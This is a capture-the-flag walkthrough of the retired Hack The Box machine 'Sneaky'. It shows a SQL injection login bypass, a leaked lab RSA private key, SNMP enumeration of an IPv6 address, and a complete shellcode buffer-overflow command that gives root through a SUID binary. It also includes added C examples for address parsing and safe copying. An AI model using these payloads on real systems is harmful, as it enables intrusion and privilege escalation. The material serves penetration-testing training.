HTB – Sneaky

Today we are going to solve another CTF challenge, “Sneaky”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Sneaky is a retired vulnerable lab presented by Hack The Box, which offers online penetration-testing practice matched to your experience level; they have a collection of vulnerable labs as challenges ranging from beginner to expert level.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

root@kali:~/htb/sneaky# nmap -sT -sU -p 161,80 10.10.10.20
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 10:56 CET
Stats: 0:00:15 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 10.10.10.20
Host is up (0.026s latency).

PORT    STATE  SERVICE
80/tcp  open   http
161/tcp closed snmp
80/udp  closed http
161/udp open   snmp

Nmap done: 1 IP address (1 host up) scanned in 16.83 seconds

As port 80 is running HTTP, we open it in our browser; the website shows that it’s under construction.

We run dirb to enumerate the directories hosted on the target machine.

root@kali:~/htb/sneaky# dirb http://10.10.10.20/
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Mon Dec 24 11:37:09 2018
URL_BASE: http://10.10.10.20/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.20/ ----
==> DIRECTORY: http://10.10.10.20/dev/

We find a directory called /dev/; opening it in our browser shows a login screen.

We find that the login page is vulnerable to SQL injection; we use this to bypass the login form by entering ' or 1=1;-- as both the username and the password.

After logging in we find a link on the webpage.

We open the link and find an RSA private key, which we download to our system.

http://10.10.10.20/dev/sshkeyforadministratordifficulttimes

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAvQxBD5yRBGemrZI9F0O13j15wy9Ou8Z5Um2bC0lMdV9ckyU5
Lc4V+rY81lS4cWUx/EsnPrUyECJTtVXG1vayffJISugpon49LLqABZbyQzc4GgBr
3mi0MyfiGRh/Xr4L0+SwYdylkuX72E7rLkkigSt4s/zXp5dJmL2RBZDJf1Qh6Ugb
yDxG2ER49/wbdet8BKZ9EG7krGHgta4mfqrBbZiSBG1ST61VFC+G6v6GJQjC02cn
cb+zfPcTvcP0t63kdEreQbdASYK6/e7Iih/5eBy3i8YoNJd6Wr8/qVtmB+FuxcFj
oOqS9z0+G2keBfFlQzHttLr3mh70tgSA0fMKMwIDAQABAoIBAA23XOUYFAGAz7wa
Nyp/9CsaxMHfpdPD87uCTlSETfLaJ2pZsgtbv4aAQGvAm91GXVkTztYi6W34P6CR
h6rDHXI76PjeXV73z9J1+aHuMMelswFX9Huflyt7AlGV0G/8U/lcx1tiWfUNkLdC
CphCICnFEK3mc3Mqa+GUJ3iC58vAHAVUPIX/cUcblPDdOmxvazpnP4PW1rEpW8cT
OtsoA6quuPRn9O4vxDlaCdMYXfycNg6Uso0stD55tVTHcOz5MXIHh2rRKpl4817a
I0wXr9nY7hr+ZzrN0xy5beZRqEIdaDnQG6qBJFeAOi2d7RSnSU6qH08wOPQnsmcB
JkQxeUkCgYEA3RBR/0MJErfUb0+vJgBCwhfjd0x094mfmovecplIUoiP9Aqh77iz
5Kn4ABSCsfmiYf6kN8hhOzPAieARf5wbYhdjC0cxph7nI8P3Y6P9SrY3iFzQcpHY
ChzLrzkvV4wO+THz+QVLgmX3Yp1lmBYOSFwIirt/MmoSaASbqpwhPSUCgYEA2uym
+jZ9l84gdmLk7Z4LznJcvA54GBk6ESnPmUd8BArcYbla5jdSCNL4vfX3+ZaUsmgu
7Z9lLVVv1SjCdpfFM79SqyxzwmclXuwknC2iHtHKDW5aiUMTG3io23K58VDS0VwC
GR4wYcZF0iH/t4tn02qqOPaRGJAB3BD/B8bRxncCgYBI7hpvITl8EGOoOVyqJ8ne
aK0lbXblN2UNQnmnywP+HomHVH6qLIBEvwJPXHTlrFqzA6Q/tv7E3kT195MuS10J
VnfZf6pUiLtupDcYi0CEBmt5tE0cjxr78xYLf80rj8xcz+sSS3nm0ib0RMMAkr4x
hxNWWZcUFcRuxp5ogcvBdQKBgQDB/AYtGhGJbO1Y2WJOpseBY9aGEDAb8maAhNLd
1/iswE7tDMfdzFEVXpNoB0Z2UxZpS2WhyqZlWBoi/93oJa1on/QJlvbv4GO9y3LZ
LJpFwtDNu+XfUJ7irbS51tuqV1qmhmeZiCWIzZ5ahyPGqHEUZaR1mw2QfTIYpLrG
UkbZGwKBgGMjAQBfLX0tpRCPyDNaLebFEmw4yIhB78ElGv6U1oY5qRE04kjHm1k/
Hu+up36u92YlaT7Yk+fsk/k+IvCPum99pF3QR5SGIkZGIxczy7luxyxqDy3UfG31
rOgybvKIVYntsE6raXfnYsEcvfbaE0BsREpcOGYpsE+i7xCRqdLb
-----END RSA PRIVATE KEY-----

The target machine does not appear to expose an SSH service, so for now we cannot use this key to log in through SSH.

To investigate further, we enumerate the SNMP service to gain more information.

root@kali:~/htb/sneaky# snmpwalk -v2c -c public 10.10.10.20
iso.3.6.1.2.1.1.1.0 = STRING: "Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (3570073) 9:55:00.73
iso.3.6.1.2.1.1.4.0 = STRING: "root"
iso.3.6.1.2.1.1.5.0 = STRING: "Sneaky"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
root@kali:~/htb/sneaky# python enyx.py 2c public 10.10.10.20
#######################################################################
[+] Snmpwalk found.
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:fe8f:6bf0
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:fe8f:6bf0

or

root@kali:~/htb/sneaky# apt install snmp-mibs-downloader
root@kali:~/htb/sneaky# vi /etc/snmp/snmp.conf
# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
# mibs :
root@kali:~/htb/sneaky# snmpwalk -v2c -c public 10.10.10.20 > snmpwalk.txt

root@kali:~/htb/sneaky# cat snmpwalk.txt | grep ipv6
IP-MIB::ipAddressPrefix.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:8f:6b:f0" = OID: IP-MIB::ipAddressPrefixOrigin.2.ipv6."de:ad:be:ef:00:00:00:00:00:00:00:00:00:00:00:00".64
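The SNMP walk above exposes the host's IPv6 addresses only as 16 raw octets in the index of IP-MIB::ipAddressPrefix, which is the conversion enyx.py performs for you. As an added example that is not part of this writeup and not enyx.py's code, the following C program turns that index into a normal IPv6 address with inet_ntop(): it accepts the colon-separated hex form shown above and, as an assumption about the MIB-less rendering, a dot-separated decimal form. Fed the IP-MIB line from above it prints dead:beef::250:56ff:fe8f:6bf0. From the defender's side the same conversion is handy for auditing exactly what a read-only community string such as public discloses: the addresses of every interface, including ones that are not reachable from the scanning side over IPv4.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <arpa/inet.h>

/*
 * Convert the 16 address octets that snmpwalk prints as the index of an
 * IP-MIB::ipAddressPrefix entry into a normal IPv6 string via inet_ntop().
 * Accepted renderings:
 *   hex, colon-separated (MIBs loaded):         "de:ad:be:ef:00:...:6b:f0"
 *   decimal, dot-separated (raw OID; assumed):  "222.173.190.239.0....107.240"
 * Returns 0 and fills out[] (at least INET6_ADDRSTRLEN bytes) on success,
 * -1 if the input does not hold exactly 16 octets in the range 0..255.
 */
int snmp_octets_to_ipv6(const char *octets, char *out, size_t out_len)
{
    unsigned char addr[16];
    int base = strchr(octets, ':') ? 16 : 10;
    const char *p = octets;
    size_t i;

    for (i = 0; i < 16; i++) {
        char *end;
        long v;
        if (!isxdigit((unsigned char)*p))
            return -1;                       /* empty octet, sign or stray character */
        v = strtol(p, &end, base);
        if (v < 0 || v > 255)
            return -1;
        addr[i] = (unsigned char)v;
        p = end;
        if (i < 15) {
            if (*p != ':' && *p != '.')
                return -1;                   /* fewer than 16 octets */
            p++;
        }
    }
    if (*p != '\0')
        return -1;                           /* more than 16 octets or trailing junk */
    if (inet_ntop(AF_INET6, addr, out, (socklen_t)out_len) == NULL)
        return -1;
    return 0;
}

/*
 * Extract the interface address from one MIB-rendered snmpwalk line such as
 *   IP-MIB::ipAddressPrefix.ipv6."de:ad:...:6b:f0" = OID: ...ipv6."de:ad:...:00".64
 * Only the first quoted index (the address) is used; the second is the prefix.
 */
int ipv6_from_snmpwalk_line(const char *line, char *out, size_t out_len)
{
    static const char marker[] = "ipv6.\"";
    char octets[64];                         /* 16 decimal octets + 15 dots fit */
    const char *start = strstr(line, marker);
    const char *end;
    size_t n;

    if (start == NULL)
        return -1;
    start += sizeof marker - 1;
    end = strchr(start, '"');
    if (end == NULL)
        return -1;
    n = (size_t)(end - start);
    if (n >= sizeof octets)
        return -1;
    memcpy(octets, start, n);
    octets[n] = '\0';
    return snmp_octets_to_ipv6(octets, out, out_len);
}

/* Stand-alone use: snmpwalk -v2c -c public <host> | ./ipv6idx */
int main(void)
{
    char line[1024], addr[INET6_ADDRSTRLEN];
    while (fgets(line, sizeof line, stdin) != NULL)
        if (ipv6_from_snmpwalk_line(line, addr, sizeof addr) == 0)
            printf("%s\n", addr);
    return 0;
}
```

Build with cc -o ipv6idx ipv6idx.c and pipe the saved snmpwalk.txt into it. Any input that does not parse as exactly 16 octets is rejected rather than guessed at, so a truncated or mangled line cannot produce a wrong address.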

After finding the IPv6 address of the target machine, we log in through SSH using the username and the RSA private key that we found after logging in on the /dev/ page.

root@kali:~/htb/sneaky# ssh -i priv -6 thrasivoulos@dead:beef:0000:0000:0250:56ff:fe8f:6bf0
The authenticity of host 'dead:beef::250:56ff:fe8f:6bf0 (dead:beef::250:56ff:fe8f:6bf0)' can't be established.
ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'dead:beef::250:56ff:fe8f:6bf0' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Dec 24 04:46:18 EET 2018

System load: 0.0 Memory usage: 4% Processes: 177
Usage of /: 9.9% of 18.58GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077
thrasivoulos@Sneaky:~$ ls

After logging in through SSH we find a file called user.txt; we open it and find our first flag. Next we look for files with the SUID bit set.

thrasivoulos@Sneaky:~$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/ping6
/bin/fusermount
/bin/ping
/usr/local/bin/chal
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/at
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
thrasivoulos@Sneaky:~$
  • After enumerating the executable, we find it is a 32-bit ELF binary that uses strcpy().
  • strcpy() copies without any bounds check, so the binary is vulnerable to a buffer overflow.
  • After running the binary under gdb and working out the memory layout, the following command successfully spawns a shell as root.
  • The shellcode used is:
thrasivoulos@Sneaky:/usr/local/bin$ ./chal $(python -c 'print "\x90"*330 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x42\xf4\xff\xbf"*30')
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
# whoami
root
# cd /
# cd root
# cat root.txt
c515*****b33
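To make the bullet points above concrete, here is the vulnerable pattern the writeup describes next to a bounded version. This is an added C example, not the source of the chal binary (which the page does not show); the buffer size ARG_BUF is an assumption. strcpy() stops only at the NUL terminator of its source, so an argument longer than the destination silently overwrites whatever sits above the buffer on the stack, which is what the long argument above takes advantage of. The bounded copy refuses anything that does not fit, together with its terminator, instead of truncating or overflowing silently.

```c
#include <stdio.h>
#include <string.h>

#define ARG_BUF 64   /* assumed size; the page does not give chal's buffer size */

/*
 * The pattern the page attributes to /usr/local/bin/chal: argv[1] is copied
 * into a fixed-size stack buffer with strcpy(), which never looks at the
 * destination size. Any argument of ARG_BUF bytes or more writes past buf,
 * over the saved frame pointer and return address. Shown for contrast only;
 * nothing below calls it.
 */
void vulnerable_copy(const char *arg)
{
    char buf[ARG_BUF];
    strcpy(buf, arg);                 /* unbounded write into buf */
    printf("%s\n", buf);
}

/*
 * Hardened replacement: measure src without reading past dst_size bytes,
 * refuse input that does not fit with its NUL, and only then copy.
 * Returns 0 on success, -1 on rejection; dst is untouched on rejection.
 */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = 0;
    while (n < dst_size && src[n] != '\0')
        n++;
    if (n >= dst_size)
        return -1;                    /* src has >= dst_size bytes: would overflow */
    memcpy(dst, src, n + 1);          /* n < dst_size, so n + 1 bytes fit */
    return 0;
}

/* Stand-alone use: ./bounded <arg>; over-long arguments are reported, not copied. */
int main(int argc, char **argv)
{
    char buf[ARG_BUF];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return 2;
    }
    if (bounded_copy(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buf - 1);
        return 1;
    }
    printf("%s\n", buf);
    return 0;
}
```

Compile with cc -o bounded bounded.c and pass it a long argument: it prints "argument too long" and exits instead of corrupting its stack. Two further points are worth checking on a SUID-root binary like this one: the payload above returns into a fixed stack address and runs its shellcode from there, which only works when stack addresses are not randomized and the stack is executable, so ASLR, NX and stack protectors are the compile-time and host-level defences to verify; and whether the binary needs the SUID bit at all, since a plain bug in a non-SUID program would not have handed over root.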

 

Author: Jacco Straathof
